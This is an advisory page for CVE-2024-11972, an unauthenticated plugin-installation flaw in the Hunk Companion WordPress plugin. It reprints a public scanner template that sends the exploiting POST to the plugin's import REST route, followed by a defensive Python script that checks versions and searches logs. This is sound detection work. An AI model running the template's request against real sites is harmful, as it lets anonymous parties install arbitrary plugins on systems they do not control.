CVE-2024-11972: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation

Date: 2025-08-01 | Affected software: Hunk Companion | PoC: public

Vulnerability description

The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.

PoC code [public]

id: CVE-2024-11972

info:
  name: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
  author: s4e-io
  severity: critical
  description: |
    The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.
  reference:
    - https://wpscan.com/vulnerability/4963560b-e4ae-451d-8f94-482779c415e4/
    - https://github.com/JunTakemura/exploit-CVE-2024-11972
    - https://github.com/Nxploited/CVE-2024-11972-PoC
    - https://github.com/RonF98/CVE-2024-11972-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-11972
    epss-score: 0.91001
    epss-percentile: 0.99624
    cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: themehunk
    product: hunk_companion
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hunk-companion/"
  tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev

variables:
  plugin: "{{to_lower(rand_text_alpha(6))}}"
  x-wp-nonce: "{{to_lower(rand_text_alpha(12))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/hc/v1/themehunk-import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"templateType":"free","plugin":{"{{plugin}}": "{{plugin}}"},"allPlugins":[{"{{plugin}}": "{{plugin}}/{{plugin}}.php"}]},"headers":{"X-WP-Nonce":"{{x-wp-nonce}}"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"\"https:\\\/\\\/'

      - type: word
        part: content_type_2
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e474412ab46ac022ef0fd1e6bc916b47c4b1d6271c53188b26c7d0e413ac898902204707093119879bf4fa00d99c34060a0a0c1822f8e913d646b8a4c272bb9f97fa:922c64590222798bb761d5b6d8e72950
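The template above exercises a single request: an unauthenticated POST to the hc/v1/themehunk-import REST route. For defenders, the two practical questions are whether an installed Hunk Companion version is below the 1.9.0 fix and whether web-server logs already show POSTs to that route. The script below is an added example, not code from the advisory or from the plugin; it checks both. It assumes combined-format access logs, and the log lines embedded in it are constructed samples. Because WordPress also serves REST routes through the rest_route query parameter, the check covers that form as well as the /wp-json path. Since the template sends the nonce inside the JSON body rather than as a real header, an access log cannot distinguish a legitimate admin import from an anonymous one; any hit here should be correlated with unexpected new directories under wp-content/plugins.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit, parse_qs

# REST route named in the advisory, and the first fixed release.
ROUTE = "/hc/v1/themehunk-import"
FIXED_VERSION = (1, 9, 0)

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Aug/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Aug/2025:10:00:02 +0000] "POST /wp-json/hc/v1/themehunk-import HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Aug/2025:10:05:44 +0000] "POST /?rest_route=/hc/v1/themehunk-import HTTP/1.1" 200 398 "-" "curl/8.4.0"
192.0.2.55 - - [01/Aug/2025:10:07:10 +0000] "GET /wp-json/hc/v1/themehunk-import HTTP/1.1" 404 77 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class Hit:
    ip: str
    timestamp: str
    path: str
    status: int


def targets_import_route(raw_target: str) -> bool:
    """True if the request target reaches the import route by either routing style."""
    parts = urlsplit(raw_target)
    if parts.path.rstrip("/") == "/wp-json" + ROUTE:
        return True
    # Pretty permalinks disabled: /?rest_route=/hc/v1/themehunk-import
    for value in parse_qs(parts.query).get("rest_route", []):
        if value.rstrip("/") == ROUTE:
            return True
    return False


def find_install_requests(lines):
    """Return every POST to the import route; GETs are ignored because the
    template (and the plugin's import handler) use POST."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"].upper() != "POST":
            continue
        if targets_import_route(m["path"]):
            hits.append(Hit(m["ip"], m["ts"], m["path"], int(m["status"])))
    return hits


def parse_version(version: str) -> tuple:
    """'1.8.9' -> (1, 8, 9); short versions are zero-padded."""
    nums = [int(x) for x in re.findall(r"\d+", version)]
    return tuple((nums + [0, 0, 0])[:3])


def is_affected(installed_version: str) -> bool:
    """Affected if the installed plugin is older than the 1.9.0 fix."""
    return parse_version(installed_version) < FIXED_VERSION


if __name__ == "__main__":
    for v in ("1.8.9", "1.9.0", "1.10.2"):
        print(f"Hunk Companion {v}: {'AFFECTED' if is_affected(v) else 'fixed'}")
    for hit in find_install_requests(SAMPLE_LOG.splitlines()):
        print(f"{hit.timestamp} {hit.ip} POST {hit.path} -> {hit.status}")
```

A 200 on a POST to this route from an address with no prior authenticated session is the signal worth alerting on; a 401 or 403 on the same route is what a patched 1.9.0+ install should produce for anonymous callers.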
